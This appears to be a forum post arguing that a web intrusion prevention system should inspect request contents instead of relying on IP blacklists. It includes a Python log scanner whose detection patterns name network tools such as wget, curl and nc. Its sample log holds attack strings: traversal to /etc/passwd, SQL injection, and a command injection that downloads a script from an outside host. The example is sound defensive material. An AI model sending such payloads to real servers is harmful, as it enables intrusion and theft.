Almost every properly configured commercial system will have only one TCP/IP port open to the Internet: Port 80.

Since this is the only way into the system, hackers will try many different ways to compromise it via this port. Surprisingly, there have been only about 80 to 90 different hack queries in common use over the last six years or so.

Commonly available IDS/IPS systems seem to fall into only one category: one that keeps a blacklist of several hundred thousand malicious addresses, to which it refers every time a query appears on port 80. To stay current, the blacklist is updated every few days.

Since there are only about 80 distinct hack query formats, doesn't it make more sense to evaluate the threat by examining the query?

That's how we designed our IPS:

https://www.researchgate.net/project/IDaaS-with-secure-data-at-rest/update/5b8f19fccfe4a76455f0c213?_iepl%5BviewId%5D=7PJXGOO2rJBWn0d2VYesBa4Z&_iepl%5Bcontexts%5D%5B0%5D=projectUpdatesLog&_iepl%5BinteractionType%5D=projectUpdateDetailClickThrough
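As an added illustration of the query-inspection approach the question argues for, here is a small Python example of my own. It is not Mark Sitkowski's IPS and is not taken from the linked project. It matches the request line of each web-server log entry against a handful of request-shape signatures (path traversal, SQL injection, command injection, admin-page probing) after percent-decoding it, and compares that verdict with a plain IP-blacklist lookup. The log lines, the four signatures and the one-entry blacklist are all constructed for this example; a real rule set would be larger and would need to be tuned against false positives on the site's legitimate URLs.

```python
import re
from urllib.parse import unquote_plus

# Constructed, illustrative rule set: four request-shape signatures.
# This is NOT the author's IPS rule set, and it is not the full list of
# "80 to 90" query formats the question refers to.
SIGNATURES = {
    "path_traversal": re.compile(r"\.\./|\.\.\\"),
    "sql_injection": re.compile(
        r"'\s*(or|and)\s+\S+\s*=\s*\S+|union\s+(all\s+)?select", re.I),
    "command_injection": re.compile(
        r"[;|`]\s*(cat|wget|curl|sh|bash|nc)\b", re.I),
    "admin_probe": re.compile(
        r"/(phpmyadmin|wp-login\.php|xmlrpc\.php)\b", re.I),
}

# Constructed one-entry blacklist, standing in for the "several hundred
# thousand" addresses an address-based IPS would carry.
IP_BLACKLIST = {"203.0.113.7"}

# Apache common log format: ip ident user [time] "METHOD target HTTP/x.y" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize(target):
    """Percent-decode the request target, up to twice, so that both
    plain (%2e%2e%2f) and double-encoded (%252e%252e%252f) forms are
    compared against the same decoded text. '+' is decoded to a space."""
    decoded = target
    for _ in range(2):
        again = unquote_plus(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded


def classify(target):
    """Return the names of the signatures the decoded target matches
    (empty list for a benign-looking request)."""
    decoded = normalize(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def parse_line(line):
    """Extract (ip, method, target) from a common-log-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("method"), m.group("target")


def scan(lines):
    """Give each parsable log line two verdicts: the blacklist's (by source
    address) and the content inspector's (by what the query looks like)."""
    results = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, _method, target = parsed
        results.append({
            "ip": ip,
            "target": target,
            "blacklisted": ip in IP_BLACKLIST,
            "tags": classify(target),
        })
    return results


def summarize(results):
    """Count how many lines each approach would have flagged."""
    return {
        "blacklist_hits": sum(1 for r in results if r["blacklisted"]),
        "content_hits": sum(1 for r in results if r["tags"]),
    }


# Constructed sample log: one blacklisted address fetching a benign page,
# and four non-blacklisted addresses sending recognisable attack queries.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2018:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326',
    '203.0.113.7 - - [10/Oct/2018:13:55:37 +0000] "GET /index.html HTTP/1.1" 200 2326',
    '198.51.100.9 - - [10/Oct/2018:13:55:40 +0000] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 404 209',
    '198.51.100.9 - - [10/Oct/2018:13:55:41 +0000] "GET /%252e%252e%252fetc/passwd HTTP/1.1" 404 209',
    '192.0.2.33 - - [10/Oct/2018:13:55:45 +0000] "GET /products.php?id=1%27+or+1%3D1-- HTTP/1.1" 200 512',
    '192.0.2.33 - - [10/Oct/2018:13:55:46 +0000] "GET /cgi-bin/test.cgi?cmd=%3Bwget+http://203.0.113.9/x.sh HTTP/1.1" 500 0',
    '192.0.2.50 - - [10/Oct/2018:13:55:50 +0000] "GET /wp-login.php HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["target"], "blacklist" if r["blacklisted"] else "-", r["tags"])
    print(summarize(scan(SAMPLE_LOG)))
```

Run as written, the blacklist flags only the benign request from 203.0.113.7 and misses all five attack queries, while the content inspector flags exactly the five attack queries regardless of source address. The decode-twice step is the part most often skipped: without it the double-encoded traversal on the fourth line sails through. The caveat a practitioner would add is that signatures must be checked against the site's own legitimate URL space before blocking on them, since a broad pattern like the SQL one can match unusual but harmless query strings.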
